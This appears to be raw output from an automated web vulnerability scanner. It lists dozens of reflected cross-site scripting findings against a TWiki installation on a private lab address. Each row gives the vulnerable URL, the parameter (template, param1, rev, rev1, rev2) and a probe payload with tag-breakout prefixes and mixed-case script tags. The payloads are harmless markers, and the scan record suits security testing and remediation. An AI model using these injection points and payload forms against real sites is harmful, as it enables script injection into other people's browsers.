http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VYHS(9431)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >HJxt(5971)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >AakD(9340)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >GeYa(6153)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >zlhC(1656)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >Yexv(7145)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >crOY(1753)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >AtVH(7370)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ainf(6671)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >egoY(6294)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore&param1=1.10&param2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore&param1=1.10&param2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >TkHx(4037)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ainf(6671)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >tWPZ(1509)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >NjOP(5062)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >KfHj(1141)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >crOY(1753)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore&param1=1.33&param2=1.33 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore&param1=1.33&param2=1.33 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >pZJp(6331)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >sbMS(7039)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >xERz(7035)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore&param1=1.20&param2=1.20 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore&param1=1.20&param2=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Hsqa(8711)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload&param1=view.ppt | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload&param1=view.ppt has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</code><ScRiPt >tTtd(9970)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore&param1=1.35&param2=1.35 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore&param1=1.35&param2=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >TntV(1629)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >rhnt(9923)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload&param1=piece.mp4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload&param1=piece.mp4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ZiaU(2860)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >KFDg(1578)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >UApR(3278)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >aWAd(5990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >KdsD(9762)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >GKmg(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >AakD(9340)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >MZlm(4554)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >aWAd(5990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >UbAX(8618)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev=1.9 | Target: http://192.168.105.200/twiki/bin/view/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev=1.9%3C%2Ftitle%3E%3CScRiPt %3EUSRr(1705)%3C%2FScRiPt%3E exists Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability payload: </title><ScRiPt >USRr(1705)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >wyUZ(2737)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.38&param2=1.38 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.38&param2=1.38 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >NOkX(1910)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >AcCi(1273)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >uoPe(4619)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >QdkZ(4467)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >vngn(6845)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore&param1=1.34&param2=1.34 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore&param1=1.34&param2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >yvZt(2061)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore&param1=1.12&param2=1.12 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore&param1=1.12&param2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >dial(4055)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore&param1=1.3&param2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore&param1=1.3&param2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >xltb(6335)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >COZY(2764)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >UGjL(9051)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >jFLc(2648)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >UApR(3278)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >mwpe(8623)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore&param1=1.7&param2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore&param1=1.7&param2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >qUdy(5462)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >LdRj(2788)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore&param1=1.18&param2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore&param1=1.18&param2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Yqgf(1667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore&param1=1.54&param2=1.54 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore&param1=1.54&param2=1.54 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >XrtI(9115)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore&param1=1.3&param2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore&param1=1.3&param2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >xltb(6335)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiTopic?rev=r1.5 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiTopic?rev=r1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</td><ScRiPt >OmkT(3122)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore&param1=1.24&param2=1.24 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore&param1=1.24&param2=1.24 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >tiQU(3083)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore&param1=1.5&param2=1.5 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore&param1=1.5&param2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Flox(1409)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >IMdT(3879)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >JDrO(8158)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiNotation?rev=r1.3 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiNotation?rev=r1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >jUku(2347)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore&param1=1.42&param2=1.42 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore&param1=1.42&param2=1.42 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >cYQR(9849)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >rhnt(9923)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Clwj(8914)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload&param1=piece.mp4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload&param1=piece.mp4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</code><ScRiPt >ZiaU(2860)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >sCPs(7861)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >WrvH(6068)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >qSSF(5773)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >xVKj(5339)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >LdRj(2788)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >TtSL(6019)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >NNCM(7600)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >hOfO(2848)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >EnkV(2319)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore&param1=1.10&param2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore&param1=1.10&param2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ySpY(7995)</ScRiPt> |
